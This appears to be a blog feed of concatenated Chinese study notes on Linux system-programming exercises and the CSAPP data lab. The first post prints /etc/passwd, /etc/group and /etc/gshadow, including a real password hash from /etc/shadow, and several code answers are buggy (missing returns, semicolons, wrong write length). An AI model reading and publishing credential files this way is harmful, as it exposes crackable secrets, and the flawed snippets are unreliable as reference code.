sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:108::/var/run/dbus:/bin/false
strongswan:x:106:65534::/var/lib/strongswan:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
geoclue:x:109:114::/var/lib/geoclue:/bin/false
nm-openconnect:x:110:115:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/bin/false
nm-openvpn:x:111:116:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:113:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
gluster:x:116:123::/var/lib/glusterd:/bin/false
jakevin:x:1000:1000::/home/jakevin:/bin/bash
miredo:x:117:65534::/var/run/miredo:/bin/false
sshd:x:118:65534::/run/sshd:/usr/sbin/nologin
mysql:x:119:125:MySQL Server,,,:/nonexistent:/bin/false

第一个字段是登录名;第二个字段是经过加密后的密码(x),实际上经过加密后的密码是存放在shadow密码文件;

第三个字段是用户的ID(UID);第四个字段是组ID(GID);第五个字段是注释;

第六个字段是主目录,是用户登录后的初始路径;第七个字段是登录shell。

实际存放密码的shadow 密码文件/etc/shadow

1
2
3
4
jakevin:$6$tnTgvJYU$OhoUNZNIeNU7rlZf/f14oD2g.Uz8SbrnWeZbR4yL4XXRvzbCeijsAZE7Y9HlzU4thKVBVcqucwntJBi/4BoY60:15880:0:99999:7:::
mysql:!:15905:0:99999:7:::
ftp:*:16039:0:99999:7:::
telnetd:*:16180:0:99999:7:::

第一个字段为用户登录名,第二个字段为见过加密后的密码,后面的字段为与安全性相关的字段。

看组文件/etc/group

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
jakevin@jakevin-PC:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:jakevin
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:jakevin
audio:x:29:pulse
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:jakevin
nogroup:x:65534:
systemd-journal:x:101:
systemd-timesync:x:102:
systemd-network:x:103:
systemd-resolve:x:104:
systemd-bus-proxy:x:105:
input:x:106:
crontab:x:107:
messagebus:x:108:
netdev:x:109:jakevin
bluetooth:x:110:
ssl-cert:x:111:
ssh:x:112:
lpadmin:x:113:jakevin
geoclue:x:114:
nm-openconnect:x:115:
nm-openvpn:x:116:
scanner:x:117:jakevin
lightdm:x:118:
pulse:x:119:
pulse-access:x:120:
avahi:x:121:
rdma:x:122:
gluster:x:123:
sambashare:x:124:jakevin
jakevin:x:1000:
bumblebee:x:999:jakevin
autologin:x:998:jakevin
wireshark:x:1001:jakevin
mysql:x:125:
docker:x:997:jakevin
kvm:x:126:

第一个字段是组的名称,第二个字段是经过加密的密码,第三个字段是组ID(GID),第四个字段是用户列表。

对于加密后的密码存放在类似/etc/shadow的文件(/etc/gshadow),格式如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
jakevin@jakevin-PC:~$ sudo cat /etc/gshadow
[sudo] jakevin 的密码:
root:*::
daemon:*::
bin:*::
sys:*::
adm:*::
tty:*::
disk:*::
lp:*::jakevin
mail:*::
news:*::
uucp:*::
man:*::
proxy:*::
kmem:*::
dialout:*::
fax:*::
voice:*::
cdrom:*::
floppy:*::

习题8.1

书上的习题应该是错的,也就是注释部分,结果是1000 ,0和题目描述不符

~搜了下,改成下面的就是一样的了,说是因为,指针指向的地址一样,但自己没想明白,先搁着吧….~

更:
问题就出在这个存储用户信息的结构体上面,它是由getpw函数在程序中自定义的一块静态存储区,而且每调用一次getpw函数,这个静态存储区就会被重写一次

1
2
3
4
5
6
7
8
9
10
11
12
#include <stdio.h>
#include <pwd.h>

int main(int argc, char *argv[]){
    struct passwd *p1, *p2;
    p1 = getpwnam("jakevin");
    p2 = getpwnam("root");
    printf("%ld %ld\n",(long)p1->pw_uid,(long)p2->pw_uid);
    /* printf("%ld %ld\n", (long)(getpwnam("jakevin")->pw_uid), (long)(getpwnam("root")->pw_uid));
    */
    return 0;
}

—–身体不好,感觉此章没看好,待更—–

]]> <h2 id="第8章"><a href="#第8章" class="headerlink" title="第8章"></a>第8章</h2><h3 id="笔记"><a href="#笔记" class="headerlink" title="笔记"></a>笔记</h3><b linux/unix系统编程手册 7章习题 https://jackwener.github.io/2018/05/08/tlpi7章习题/ 2018-05-08T05:48:49.000Z 2018-05-08T08:03:23.511Z

看的过程中发现自己C学的很不好啊 ……

之前CSAPP没坚持下来,后面把CSAPP搞定吧…

太菜了╮(╯▽╰)╭

7-1

修改程序清单7-1中的程序,在每次malloc后打印program break 的值。指定一个较小的内存分配尺寸,观察现象,证明的每次malloc后program break分配了超过所需的内存区域。

7-1 修改程序清单7-1中的程序,在每次malloc后打印program break 的值。指定一个较小的内存分配尺寸,观察现象,证明的每次malloc后program break分配了超过所需的内存区域。
我们可以通过一个更简单的程序来实现观察所需的功能。

1
2
3
4
5
6
7
8
9
10
11
12
#include <unistd.h>
#include <malloc.h>

int main(void){
    printf("now : %10p\n", sbrk(0));
    char * a;
    for (int i = 0; i<10; i++)
    {   
        a = malloc(50000);
        printf("%d : %10p\n",i, sbrk(0));
    }
}

运行程序输出如下:

now : 0xaf060fc000

0 : 0xaf0611d000

1 : 0xaf0611d000

2 : 0xaf06141000

3 : 0xaf06141000

4 : 0xaf06141000

5 : 0xaf06166000

6 : 0xaf06166000

7 : 0xaf06166000

8 : 0xaf0618b000

9 : 0xaf0618b000

我们可以看到每次实际上边界分配了空间大于我们所需的空间。

7-2

实现malloc()和free()。
根据课本可以知道,malloc和free是对堆操作的包装,也就是brk函数的包装,在堆空间进行的数据结构的操作

]]> <blockquote> <p>看的过程中发现自己C学的很不好啊 ……</p> <p>之前CSAPP没坚持下来,后面把CSAPP搞定吧…</p> <p>太菜了╮(╯▽╰)╭</p> </blockquote> <h3 id="7-1"><a href="#7-1" class=" linux/unix系统编程手册 6章习题 https://jackwener.github.io/2018/05/07/tlpi6章习题/ 2018-05-07T09:22:22.000Z 2018-05-08T08:03:35.114Z

定了个小计划,大概能2-3天看一章并做习题,这套书感觉也可能不会看完,实在太多了,看了1本之后估计后面当手册翻翻

这章环境那一些看的不太懂2333

6-1

编译程序清单6-1中的程序,使用ls -l命令显示可执行文件的大小,解释为什么可执行文件的大小远小于10MB,但是程序中包含了一个10MB的数组?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#include <stdio.h>
#include <stdlib.h>
char globBuf[65536];
int primes[] = {2, 3, 5, 7};
static int square(int x)
{
    int result;
    result = x * x;
    return result;
}
static void doCalc(int val)
{
    printf("The square of %d is %d\n", val, square(val));
    if (val < 1000)
    {
        int t;
        t = val * val * val;
        printf("The cube of %d is %d\n", val, t);
    }
}
int main(void)
{
    static int key = 9973;
    static char mbuf[10240000];
    char* p;
    p = malloc(1024);
    doCalc(key);
    exit(EXIT_SUCCESS);
  }

编译后占用体积的部分主要是

char globBuf[65536];

至于

static int key = 9973;

static char mbuf[10240000];

未初始化的部分不分配空间,后面等程序加载器分配

6-2

编写程序,观察longjmp函数试图跳转到一个已经返回的函数中会出现什么。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <stdlib.h>
#include <setjmp.h>
#include <stdio.h>

jmp_buf env;

void x()
{
    if (setjmp(env) == 0)
    {
        printf("1\n");
    }
    else
    {
        printf("2\n");
    }
}

void y()
{
    longjmp(env, 1);
    printf("3\n");
}

int main(void)
{
    x();
    y();
    printf("4\n");
    return 0;
}

出现

1

2

4

原因书上有解释,尝试返回一个释放了的栈帧.
这个题按着书上 滥用longjmp()部分写就可以了

6-3

使用getenv()函数,putenv()函数来实现setenv()和unsetenv()函数。unsetenv函数需要将多个同名的环境变量都移除。

]]> <blockquote> <p>定了个小计划,大概能2-3天看一章并做习题,这套书感觉也可能不会看完,实在太多了,看了1本之后估计后面当手册翻翻</p> </blockquote> <blockquote> <p>这章环境那一些看的不太懂2333</p> </blockquote linux/unix系统编程手册 5章习题 https://jackwener.github.io/2018/05/06/tlpi5章习题/ 2018-05-06T08:20:51.000Z 2018-05-07T14:46:31.597Z

一本书600页,2本1000多页,好多啊 QAQ

5-1

请使用标准I/O系统调用(open和lseek)和off_t数据类型修改程序清单5-3中的程序。将宏_FILE_OFFSET_BITS的值设置为64进行编译,并测试该程序是否能够成功创建一个大文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#define _FILE_OFFSET_BITS 64
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

int main(int argc, char *argv[])
{
    int fd;
    off_t off;
    if (argc != 3 ||strcmp(argv[1], "--help") == 0)
    {
        printf("pathname or offset erroe");
        _exit(0);
    }

    fd = open(argv[1],O_RDWR|O_CREAT,S_IRUSR|S_IWUSR);
    if(fd == -1)
    {
        printf("open error");
        _exit(0);
    }

    off = atoll(argv[2]);
    if(lseek(fd,off,SEEK_SET) == -1)
    {
        printf("lseek error");
        _exit(0);
    }
    if(write(fd,"test",SEEK_SET) == -1)
    {
        printf("write error");
        _exit(0);
    }
}

编译运行结果好像是错的…没查出Bug,照着书上打的,应该感觉没问题 (? _ ?)

5-2

编写一个程序,使用O_APPEND标志并以写方式打开一个已存在的文件,且将文件偏移量置于文件起始处,在写入数据。数据会显示在文件中的哪个位置?为什么?

在设置了O_APPEND标志后,对打开文件的写入操作write会变成一个包含有文件偏移和写入的一个原子操作,强制在文件的结尾写入,所以在写入之前使用lseek也没有办法改变写入的位置。但是可以通过lseek在文件的任意位置读取。

5-3

编写程序,接受最多3个命令参数

$ atomic_append filename num-bytes [x]

该程序打开或创建指定文件,然后每次调用write()写入一个字节的方式,向文件结尾添加num-bytes个字节。若没有参数x,使用O_APPEND标志打开文件,否则不使用该标志打开文件。而是使用lseek(fd,0,SEEK_END)并write来追加内容。运行如下命令,解释ls -l两个文件大小的为什么不同。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <string.h>

int main(int argc, char *argv[]){
    int i, fd, flags, numBytes;
    off_t off;

    flags = O_RDWR | O_CREAT;
    if(argc < 3 || strcmp(argv[1], "--help") == 0 )
    {
        printf("parameter error");
        _exit(0);
    }

    if(argc != 4)
        flags = flags | O_APPEND;

    numBytes = atoi(argv[2]);

    fd = open(argv[1], flags, S_IRUSR | S_IWUSR);
    if(fd == -1)
    {
        printf("open error");
        _exit(0);
    }
    char buff = 'a';
    for(i = 0; i < numBytes; ++i){
        if(argc > 3 && argv[3] == "x")
            if(lseek(fd, 0, SEEK_END) == -1)
                {
        printf("lseek error");
        _exit(0);
    }

        if(write(fd, &buff, 1) != 1)
            {
        printf("write error");
        _exit(0);
    }
    }

    return 0;
}

结果

jakevin@jakevin-PC:~/Linux系统编程手册$ ./automic_append f1 1000000 & ./automic_append f1 1000000
[1] 7783

jakevin@jakevin-PC:~/Linux系统编程手册$ ./automic_append f2 1000000 x & ./automic_append f2 1000000 x
[2] 7789
[1] 已完成 ./automic_append f1 1000000
[2]+ 已完成 ./automic_append f2 1000000 x

jakevin@jakevin-PC:~/Linux系统编程手册$ ls -l f1 f2

-rw——- 1 jakevin jakevin 2000000 May 7 17:00 f1

-rw——- 1 jakevin jakevin 1000000 May 7 17:00 f2

原因书上很清楚了,类似独占文件的那个例子

5-4

使用fcntl()和close()来实现dup()和dup2()。dup2()在处理oldfd和newfd相等时,应检查oldfd是否有效,测试fcntl(oldfd, F_GETFL)是否成功就可以达到这一点。若oldfd无效,则dup2返回-1,并将errno置为EBADF。

注意点:使用fcntl()和close()来实现dup()和dup2()。务必牢记dup2()需要处理的一种特殊情况,即oldfd与newfd相等。这时,应检查oldfd是否有效,测试fcntl(oldfd, F_GETFL)是否成功就能达到这一目标。若oldfd无效,则dup2()将返回-1,并将errno置为EBADF。

1
2
#include <fcntl.h>  
int fcntl(int filedes, int cmd, ...);

当第二个参数cmd=F_DUPFD时,它的作用是根据filedes复制一个新文件描述符。此时,fcntl相当于dup和dup2函数。
第三个参数指出新复制的文件描述符是一个等于或大于该参数的可用文件描述符,且不能等于一个已有的文件描述符。如果第三个参数等于一个已有文件描述符,则取一个大于该参数的一个可用描述符。

DUPFD:duplicate(复制)File(文件)Description(描述)

5-5

编写一程序,验证文件描述符及其副本是否共享了文件偏移量和打开文件的状态标识。

5-6

说明下列代码中每次执行write后,输出文件的内容是什么,为什么。

1
2
3
4
5
6
7
8
9
fd1 = open(file, O_RDWR | O_CREAT | O_TRUNC, S_IRUSR | S_IWUSR);
 fd2 = dup(fd1);
 fd3 = open(file, O_RDWR);
 write(fd1, "Hello,", 6);
 write(fd2, " world", 6);
 //这里按照答案的解释,应该是有一个空格在world前面的,书上可能是印错了
 lseek(fd2, 0, SEEK_SET);
 write(fd1, "HELLO,", 6);
 write(fd3, "Gidday", 6);

第一次write,文件变成了Hello,,第二次写入,继续在后面加上world,注意这里应该是有一个空格的,否则最后和答案对不上。第三次write,由于偏移至头,所以第三次覆盖了第一次的6个字符,变成了HELLO, world,第四次fd3的偏移量是0,所以也是从头开始写,覆盖了第三次的HELLO变成了Gidday world

5-7

使用read()、write()、malloc()实现readv,writev函数功能。

]]> <blockquote> <p>一本书600页,2本1000多页,好多啊 QAQ</p> </blockquote> <h3 id="5-1"><a href="#5-1" class="headerlink" title="5-1"></a>5-1</h3><p>请使用标准I/ linux/unix系统编程手册 4章习题 https://jackwener.github.io/2018/05/04/tlpi4章习题/ 2018-05-04T06:21:00.000Z 2018-05-07T09:33:32.948Z

作为一个咸鱼废了好久,期中很多考试,复习有点无聊,开始之前准备看的linux/unix系统编程手册

另外去官网找源代码和头文件,make失败,尝试了一会儿就放弃了,毕竟影响不大

4-1

tee命令是从标准输入中读取数据,直至文件结尾,随后将数据写入标准输出和命令行参数所指定的文件。请使用I/O系统调用实现tee命令。默认情况下,若已存在与命令行参数指定文件名同名的文件,tee命令将其覆盖。或者,当使用-a命令时,则在同名文件后面追加数据。

tee –help

1
2
3
4
5
6
7
8
9
10
$ tee --help
用法:tee [选项]... [文件]...
将标准输入复制到每个指定文件,并显示到标准输出。

  -a, --append          内容追加到给定的文件而非覆盖
  -i, --ignore-interrupts       忽略中断信号
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help            显示此帮助信息并退出
      --version         显示版本信息并退出

实现这个命令主要是这章介绍的 通用I/O模型 中的open(),close(),read(),write().
另外使用到了附录中的getopt();

另外感觉自己只有看到习题才能起看书的兴致,果然以后看书先看题再看书也不错

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#include <unistd.h>
#include <stdio.h>
#include<fcntl.h>
#include<sys/stat.h>

struct teeConfigStruct
{
    int a;
    char *outputPath;
    int outputFd;
} teeConfig;

void getArgs(int argc, char *const argv[])
{
    int opt;
    if ((opt = getopt(argc, argv, "a")) != -1)
    {
        teeConfig.a = 0;
        switch (opt)
        {
        case 'a':
            printf("追加模式\n");
            teeConfig.a = 1;
            break;
        default:
            printf("参数错误\n");
            _exit(0);
            break;
        }
    }
    if (argc - optind < 1)
    {
        printf("参数太少\n");
        _exit(0);
    }
    teeConfig.outputPath = argv[optind];
    printf("输出路径 %s \n", teeConfig.outputPath);
}

int main(int argc, char * const argv[]){
    getArgs(argc, argv);
    int outputFileFlag;
    if(teeConfig.a == 1)
    {
        outputFileFlag =O_RDWR | O_CREAT | O_APPEND;
    }
    else
    {
        outputFileFlag = O_RDWR | O_CREAT | O_TRUNC;
    }
    teeConfig.outputFd = open(teeConfig.outputPath, outputFileFlag, 0777);
    if (teeConfig.outputFd == -1)
    {
        printf("无法打开输出文件!\n");
        _exit(0);
    }
    char buff;
    while (read(STDIN_FILENO, &buff, 1) > 0)
    {
        printf("%c", buff);
        if (write(teeConfig.outputFd, &buff, 1) == -1)
        {
            printf("无法写入输出文件!\n");
        _exit(0);
        }
    }
    if (close(teeConfig.outputFd) == -1)
    {
        printf("无法关闭输出文件!\n");
        _exit(0);
    }
}

4-2

编写一个类似于cp命令的程序,当使用该程序复制一个包含空洞的文件时,能够使得目标文件和源文件内容保持一致

这个程序思路比较简单,读取源文件的一个字符,如果是0的话,使用lseek右移一个文件偏移量。否则将字符写入目标文件中。

文件空洞 :当文件的偏移量大于文件的当前长度时,文件结尾到新写入数据之间的空间称为文件空洞。读取文件空洞的内容会返回以0填充的缓冲区。

     “空洞是否占用磁盘空间由文件系统决定”
     “如果空洞的边界落在块内,而非恰好落在块的边界上,则会分配一个完整的块来存储数据,块中与空洞相关的部分则以空字节填充”—-书本提示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#include <unistd.h>
#include <stdio.h>
#include<fcntl.h>
#include<sys/stat.h>

struct copyConfigStruct{
    int inputFd;
    int outputFd;
    char *intputPath;
    char *outputPath;
}copyConfig;

int main(int argc, char *const argv[])
{
    if(argc <3)
    {
        printf("参数过少\n");
        _exit(0);
    }
    copyConfig.intputPath = argv[1];
    copyConfig.outputPath = argv[2];
    copyConfig.inputFd = open(copyConfig.intputPath,O_RDONLY);
    if(copyConfig.inputFd == -1)
    {
        printf("打开文件失败\n");
        _exit(0);
    }
     copyConfig.outputFd = open(copyConfig.outputPath, O_RDWR|O_TRUNC|O_CREAT, 0777);
    if(copyConfig.outputFd == -1){
        printf("输出文件打开失败!\n");
        _exit(0);
    }
    char buff;
    while( read(copyConfig.inputFd, &buff, 1) > 0 ){
        if (buff == 0){
            if(lseek(copyConfig.outputFd, 1, SEEK_CUR) == -1){
                printf("跳过空洞失败!\n");
                _exit(0);
            }
        }
        else if(write(copyConfig.outputFd, &buff, 1) == -1){
            printf("写入文件失败!\n");
            _exit(0);
        }
    }
    close(copyConfig.inputFd);
    close(copyConfig.outputFd);
}
]]> <blockquote> <p>作为一个咸鱼废了好久,期中很多考试,复习有点无聊,开始之前准备看的linux/unix系统编程手册</p> </blockquote> <p>另外去官网找源代码和头文件,make失败,尝试了一会儿就放弃了,毕竟影响不大</p> <h3 id="4- 随想啦啦啦 https://jackwener.github.io/2018/04/20/Linux/ 2018-04-19T17:57:12.000Z 2018-05-07T09:29:16.326Z 开坑Linux啦

从开学进来已经相当久了,但是感觉学的东西很少,平时也是比较迷茫,不知道学什么,上次进行了联创的春招熬测后,确实是收获很多,有了很多想法,ps(挺感谢这个组织的,大概也是从想进联创开始入的计算机的坑吧,很想加入它,但是想来希望不大了,以后可能还会以学习的心态去看看考试题,没报什么希望),后面很长时间可能一直待在Linux的坑里面。

书单计划

  1. Linux/Unix系统编程手册
  2. Linux/Unix编程实践教程
  3. 深入理解Linux内核
  4. 清华的操作系统的课
  5. UNP卷一

另外这次也去看看了冰岩的程序组,感觉后端似乎也挺好玩,或许会开新的坑。

ACM还是要继续(划水),好玩的东西

]]> <h1 id="开坑Linux啦"><a href="#开坑Linux啦" class="headerlink" title="开坑Linux啦"></a>开坑Linux啦</h1><blockquote> <p>从开学进来已经相当久了,但是感觉学的东西很少,平时也是比较迷茫,不 CSAPP datelab(伪)报告 https://jackwener.github.io/2018/04/14/datelab/ 2018-04-14T10:43:19.000Z 2018-04-17T15:06:57.179Z CSAPP的第一个Lab

CSAPP datelab

读CSAPP这本书的过程中出现了很多的困难,同时,我读这本书时间耗时很长但是
又完全没有弄懂很多东西,在迷迷糊糊的把书看完一遍后开始准备做配套的lab已以及准备南大的计算机系统配套的实验在这个过程中重新把书看一遍。

另外做这个Lab感觉难度不小,后面可能要补补离散

datelab分为3个部分,位操作,整数操作,浮点操作

位操作

第一题

1
2
3
4
5
6
7
/* 1 √
 * bitAnd - x&y using only ~ and |
 *   Example: bitAnd(6, 5) = 4
 *   Legal ops: ~ |
 *   Max ops: 8
 *   Rating: 1
 */

这个比较简单

1
2
3
int bitAnd(int x, int y) {
    return ~((~x) | (~y));
}

第二题

1
2
3
4
5
6
7
8
/* 2 √
 * getByte - Extract byte n from word x
 *   Bytes numbered from 0 (LSB) to 3 (MSB)
 *   Examples: getByte(0x12345678,1) = 0x56
 *   Legal ops: ! ~ & ^ | + << >>
 *   Max ops: 6
 *   Rating: 2
 */

提取一个数字的n字节,这里使用掩码0xFF来取一个字节

1
2
3
4
int getByte(int x,int n)
{
  return (x>>(n<<3)) & 0xFF;
}

第三题

1
2
3
4
5
6
7
8
/* 3 √
 * logicalShift - shift x to the right by n, using a logical shift
 *   Can assume that 0 <= n <= 31
 *   Examples: logicalShift(0x87654321,4) = 0x08765432
 *   Legal ops: ~ & ^ | + << >>
 *   Max ops: 20
 *   Rating: 3
 */

取出高位,然后把高位变为0(使用掩码)
最后把取出的高位放回去

1
2
3
4
5
6
7
int logicalShift(int x,int n)
{
  int a=x&(1<<31);
  int b=x&(~(1<<31));
  b>>=n;
  b |= (a>>n)&(1<<32+~n)/*大坑.....注意a也是逻辑右移所以要用掩码取位*/
}

第四题

/* 4 √

  • bitCount - returns count of number of 1’s in word
  • Examples: bitCount(5) = 2, bitCount(7) = 3
  • Legal ops: ! ~ & ^ | + << >>
  • Max ops: 40
  • Rating: 4

ACM做题的时候分治法的时候讲过,把32位的数分为16组,每组的两个数相加,得到16个数,然后重复即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
int bitCount(int x) {
    int bits = 0;
    int mask = 0x1 | (0x1 << 8) | (0x1 << 16) | (0x1 << 24);
    bits += (x & mask);
    bits += ((x >> 1) & mask);
    bits += ((x >> 2) & mask);
    bits += ((x >> 3) & mask);
    bits += ((x >> 4) & mask);
    bits += ((x >> 5) & mask);
    bits += ((x >> 6) & mask);
    bits += ((x >> 7) & mask);
    return (bits & 0xFF) + ((bits >> 8) & 0xFF) + ((bits >> 16) & 0xFF) + ((bits >> 24) & 0xFF);
}

第五题

1
2
3
4
5
6
7
/* 5 √
 * bang - Compute !x without using !
 *   Examples: bang(3) = 0, bang(0) = 1
 *   Legal ops: ~ & ^ | + << >>
 *   Max ops: 12
 *   Rating: 4
 */

计算数字的逆(!)
很巧妙,0的特征,0和0的相反数首位按位或为0

1
2
3
4
int bang(int x)
{
  return ((x|(~x+1))>>31)&1;
}

补码运算

第六题

1
2
3
4
int tmin()
{
  return(1<<31)
}

第七题

1
2
3
4
5
6
思路:
分正负数,分别前面为01,只需判断32-n是否全01,通过掩码取这些位即可
```c
int fitsBits(int x, int n) {
    return !((x << (33 + ~n) >> (33 + ~n))^x);
}

第八题

题意:数除以2^n
对于正数直接算术右移即可,对于负数

第九题

1
2
3
int negate(int x) {
return ~x + 1;
}

第十题

判断正数,高位为0避开0;

1
2
3
int isPositive(int x) {
return (!(x >> 31)) ^ (!(x ^ 0));
}

]]> <p>CSAPP的第一个Lab<br> 读csapp中的感悟 https://jackwener.github.io/2018/03/19/读csapp中的感悟/ 2018-03-19T02:16:58.000Z 2018-05-10T12:20:45.456Z